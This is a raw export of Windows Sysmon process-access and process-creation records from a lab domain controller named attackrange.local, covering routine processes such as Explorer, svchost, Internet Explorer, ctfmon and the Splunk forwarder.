13:58:46.788{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+d137d|C:\Windows\System32\SHELL32.dll+d1ac3|C:\Windows\System32\SHELL32.dll+d19f4|C:\Windows\System32\SHELL32.dll+d12a2|C:\Windows\SYSTEM32\IEFRAME.dll+11dd18|C:\Windows\SYSTEM32\IEFRAME.dll+d77d2|C:\Windows\SYSTEM32\IEFRAME.dll+d9f4e|C:\Windows\SYSTEM32\IEFRAME.dll+da7d4|C:\Windows\SYSTEM32\IEFRAME.dll+6851e|C:\Windows\SYSTEM32\IEFRAME.dll+de9b1|C:\Windows\SYSTEM32\IEFRAME.dll+d0abd|C:\Windows\SYSTEM32\IEFRAME.dll+d1939|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b2d 10341000x800000000000000013328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.757{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.726{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.632{59A5CD1D-9416-6005-1105-00000000A301}68286832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.476{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9416-6005-1105-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.476{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.476{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.476{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.476{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.476{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9416-6005-1105-00000000A301}6828C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.476{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9416-6005-1105-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.336{59A5CD1D-9416-6005-1105-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\shell32.dll+a205e|C:\Windows\System32\shell32.dll+d3fe2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\shell32.dll+a1fc8|C:\Windows\System32\shell32.dll+d3fe2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+a1faa|C:\Windows\System32\shell32.dll+d3fe2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+a1faa|C:\Windows\System32\shell32.dll+d3fe2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\shell32.dll+5faba|C:\Windows\System32\shell32.dll+d42b4|C:\Windows\System32\shell32.dll+d3f08|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+5faa8|C:\Windows\System32\shell32.dll+d42b4|C:\Windows\System32\shell32.dll+d3f08|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+5faa8|C:\Windows\System32\shell32.dll+d42b4|C:\Windows\System32\shell32.dll+d3f08|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.164{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:47.898{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.460{59A5CD1D-9417-6005-1605-00000000A301}70287032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:47.382{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.382{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:47.382{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.382{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:47.382{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9417-6005-1705-00000000A301}7068C:\Windows\System32\ctfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.382{59A5CD1D-93FA-6005-FC04-00000000A301}37846292C:\Windows\Explorer.EXE{59A5CD1D-9417-6005-1705-00000000A301}7068C:\Windows\System32\ctfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\Explorer.EXE+11f63|C:\Windows\Explorer.EXE+11cb7|C:\Windows\Explorer.EXE+11c0c|C:\Windows\Explorer.EXE+11b8a|C:\Windows\Explorer.EXE+1c8ea|C:\Windows\Explorer.EXE+12d17 154100x800000000000000013387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.389{59A5CD1D-9417-6005-1705-00000000A301}7068C:\Windows\System32\ctfmon.exe10.0.14393.0 (rs1_release.160715-1616)CTF LoaderMicrosoft® Windows® Operating SystemMicrosoft CorporationCTFMON.EXE"C:\Windows\System32\ctfmon.exe" 
